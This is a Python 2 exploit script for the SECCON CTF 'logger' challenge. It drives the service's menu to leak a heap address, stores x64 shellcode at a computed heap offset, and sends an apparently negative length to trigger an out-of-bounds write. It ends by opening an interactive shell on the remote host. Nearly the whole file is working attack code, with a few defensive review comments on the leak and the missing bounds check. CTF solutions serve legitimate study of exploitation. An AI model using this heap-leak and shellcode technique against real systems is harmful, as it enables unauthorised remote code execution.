# Python 2 (print-statement syntax). CTF write-up script for the SECCON
# "logger" challenge host named below; every remote interaction goes through
# the project's `phun` helper (phun.Remote, phun.p64, phun.u64, phun.sh).
import phun
import string
import random


def fill_file(n, p, addr):
    """Open a fresh connection and store a 64-byte record carrying *addr*.

    Drives the service's numbered menu on a new connection: option 1 with the
    credentials *n* / *p*, option 2 with a declared length of 64 and a payload
    of three little-endian copies of *addr*, eight 0xff bytes and whatever
    `phun.sh('x64')` returns, then option 4.

    The connection object `r` here is a local and shadows the module-level
    `r`; it is never closed explicitly.
    """
    r = phun.Remote('logger.pwn.seccon.jp',6565)
    # The menu prompt ends in "exit\n"; option 1 asks for two ':'-terminated
    # fields (the same credentials the main script registered).
    r.read('exit\n')
    r.sendline('1')
    r.read(':')
    r.sendline(n)
    r.read(':')
    r.sendline(p)
    # Option 2: declare a length of 64, then write the raw payload.
    r.read('exit\n')
    r.sendline('2')
    r.read(':')
    r.sendline(str(64))
    # Only the first 32 bytes are fixed-size (3*8 + 8); the rest is the
    # `phun.sh('x64')` blob, so the total is never checked against the
    # declared 64 here.
    payload = phun.p64(addr) *3 + "\xff" * 8 + phun.sh('x64')
    r.write(payload)
    r.read('exit\n')
    r.sendline('4')


#r = phun.Remote('localhost',1234)
r = phun.Remote('logger.pwn.seccon.jp',6565)
# Two random 58-character lowercase strings used as the option-1 credentials
# (random.choice is fine here: these only need to be unique, not secret).
n = ''.join((random.choice(string.ascii_lowercase) for i in range(58)))
p = ''.join((random.choice(string.ascii_lowercase) for i in range(58)))
r.read('exit\n')
r.sendline('1')
r.read(':')
r.sendline(n)
r.read(':')
r.sendline(p)
# Option 3 prints a "filename: " line; 32 bytes into it the script unpacks a
# 64-bit value (up to the next '=') and rounds it down to a 0x1000 boundary.
# NOTE(review): this is the information leak everything below depends on —
# the service apparently echoes a raw in-memory pointer back to the client.
# From a defender's view, output that contains raw addresses is the finding
# to fix first; without it the later offsets cannot be computed.
r.read('exit\n')
r.sendline('3')
r.read('filename: ')
r.read(32)
heap = phun.u64(r.read('=')[:-1]) & ~0xfff
print '[+] heap', hex(heap)
r.read('exit\n')
# heap + 0x250 + 32 is the address the script itself labels "shellcode"; the
# offsets are challenge-specific constants with no derivation in this file.
print '[*] shellcode', hex(heap + 0x250 + 32)
fill_file(n,p,heap + 0x250 + 32)
# Back on the original connection: option 1 again, then option 2 with a
# "length" computed as the gap between the fixed constant 0x602028 and
# heap + 0x270. Presumably that value is negative, i.e. the script assumes
# the service does not bounds-check the length it is given — TODO confirm
# against the binary. Rejecting out-of-range lengths is the server-side fix.
r.sendline('1')
r.read('exit\n')
r.sendline('2')
r.read(':')
r.sendline(str(0x602028 - (heap + 0x270)))
r.read('exit\n')
#raw_input('a')
r.sendline('1')
r.read(64)
# Hand the connection to the user interactively, then send option 4.
r.shell()
r.sendline('4')